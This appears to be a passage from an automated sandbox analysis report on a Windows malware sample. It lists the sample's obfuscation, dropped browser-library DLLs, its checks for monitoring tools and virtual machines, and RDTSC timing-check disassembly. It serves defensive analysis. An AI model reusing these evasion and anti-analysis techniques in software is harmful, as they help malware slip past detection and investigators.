Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.180000.0.unpack :EW;.rsrc :W;.idata :W; :EW;trzlrlhz:EW;xbmoezwd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;trzlrlhz:EW;xbmoezwd:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00199270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00199270
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1bc2af should be: 0x1c0591
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: trzlrlhz
Source: file.exe Static PE information: section name: xbmoezwd
Source: file.exe Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0059485D push ebx; mov dword ptr [esp], ebp 0_2_00594B0D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040384C push eax; mov dword ptr [esp], 77B68D3Dh 0_2_004038A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040384C push 099F1244h; mov dword ptr [esp], edx 0_2_00403908
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040384C push 64E96EF2h; mov dword ptr [esp], edx 0_2_00403960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040384C push 7A0719D3h; mov dword ptr [esp], edx 0_2_00403A8F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040384C push 3EAF2E37h; mov dword ptr [esp], edx 0_2_00403AC4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040384C push ecx; mov dword ptr [esp], edx 0_2_00403AE6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005AD840 push ebp; mov dword ptr [esp], esi 0_2_005AD869
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005AD840 push ecx; mov dword ptr [esp], edx 0_2_005AD8B4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005AD840 push edx; mov dword ptr [esp], ebp 0_2_005AD936
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0064382D push eax; mov dword ptr [esp], ebx 0_2_0064386F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0064382D push eax; mov dword ptr [esp], 20982D21h 0_2_006438C6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0064382D push eax; mov dword ptr [esp], edi 0_2_00643983
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0064382D push edx; mov dword ptr [esp], ebx 0_2_0064398E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005A5801 push 064FB310h; mov dword ptr [esp], eax 0_2_005A5826
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00656807 push 4B935808h; mov dword ptr [esp], esp 0_2_0065684B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00656807 push ebp; mov dword ptr [esp], ecx 0_2_0065688E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062D00D push edi; mov dword ptr [esp], ebp 0_2_0062D0B4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061C01B push ebx; mov dword ptr [esp], ecx 0_2_0061C022
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061C01B push ecx; mov dword ptr [esp], esp 0_2_0061C026
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004EB833 push 57AEFA65h; mov dword ptr [esp], edx 0_2_004EB89F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004EB833 push 673A5A5Ah; mov dword ptr [esp], ebp 0_2_004EB982
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004EB833 push 6AE88032h; mov dword ptr [esp], eax 0_2_004EB99C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00807020 push 1606C2ACh; mov dword ptr [esp], eax 0_2_0080707E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00807020 push esi; mov dword ptr [esp], 3069AFD6h 0_2_008070F6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00807020 push 6876EAD6h; mov dword ptr [esp], ecx 0_2_00807125
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005CF8FC push edx; mov dword ptr [esp], ecx 0_2_005CF937
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004EA8EA push 7D5F6576h; mov dword ptr [esp], edi 0_2_004EA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004EA8EA push ebx; mov dword ptr [esp], 2AE76B6Ch 0_2_004EA9D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004EA8EA push 09BABA4Ah; mov dword ptr [esp], eax 0_2_004EAA30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004EA8EA push ebx; mov dword ptr [esp], edx 0_2_004EAA8B
Source: file.exe Static PE information: section name: trzlrlhz entropy: 7.953821840467499
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00199270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00199270

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C3C95 second address: 3C3C9F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545560 second address: 545574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FD000CC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FD000CC0C58h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 544804 second address: 54480A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 544AB0 second address: 544AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547CFB second address: 547CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547CFF second address: 547D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547D03 second address: 547D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547D09 second address: 547D0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547D0E second address: 547D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547DA4 second address: 547DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547DA9 second address: 547DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547DAF second address: 547E3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 7BF1BC28h 0x0000000f stc 0x00000010 push 00000003h 0x00000012 mov ecx, dword ptr [ebp+122D2DD3h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FD000CC0C58h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov cx, 6D66h 0x00000038 push 00000003h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007FD000CC0C58h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D3509h], edi 0x0000005a or esi, dword ptr [ebp+122D2D8Fh] 0x00000060 call 00007FD000CC0C59h 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FD000CC0C5Dh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547E3B second address: 547E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD001095A5Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD001095A5Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547E5A second address: 547E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547F8F second address: 547F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547F93 second address: 547F98 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56870E second address: 568727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FD001095A5Ah 0x0000000c jo 00007FD001095A62h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 568727 second address: 56872D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531F57 second address: 531F72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD001095A63h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531F72 second address: 531F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566636 second address: 566647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FD001095A5Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566647 second address: 566654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnc 00007FD000CC0C56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566919 second address: 566928 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566AA7 second address: 566AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566AAD second address: 566AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566EA6 second address: 566EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C5Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566EBC second address: 566ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566ED7 second address: 566EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566EDD second address: 566EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD001095A56h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566EE9 second address: 566EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567038 second address: 567042 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567042 second address: 567065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FD000CC0C69h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5671F2 second address: 56722A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A69h 0x00000007 pushad 0x00000008 jne 00007FD001095A56h 0x0000000e je 00007FD001095A56h 0x00000014 jp 00007FD001095A56h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56722A second address: 567230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567230 second address: 567234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567234 second address: 567242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567242 second address: 567246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567394 second address: 56739A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567610 second address: 567635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FD001095A63h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56778F second address: 567793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567793 second address: 5677AB instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FD001095A68h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FD001095A56h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567906 second address: 56792C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 jnp 00007FD000CC0C56h 0x0000000e jmp 00007FD000CC0C61h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56824E second address: 568252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 568252 second address: 568266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FD000CC0C5Ch 0x0000000e jne 00007FD000CC0C56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571C52 second address: 571C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571C56 second address: 571C66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571C66 second address: 571C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571C6C second address: 571C76 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD000CC0C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 574C9A second address: 574C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 574C9E second address: 574CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57711D second address: 57714B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD001095A5Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5771EA second address: 577210 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD000CC0C58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 0E0EC7F1h 0x00000013 movsx edi, si 0x00000016 push 4F05B10Ch 0x0000001b pushad 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5777F1 second address: 5777F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 577D58 second address: 577D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 577D5C second address: 577DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD001095A61h 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FD001095A58h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov esi, edi 0x00000029 xor dword ptr [ebp+122D1C28h], eax 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD001095A5Ah 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 577DAF second address: 577DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD000CC0C5Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 577FBB second address: 577FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 577FBF second address: 577FF4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD000CC0C63h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD000CC0C68h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5782A8 second address: 5782AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5783C6 second address: 5783F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C5Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD000CC0C68h 0x00000011 rdtsc
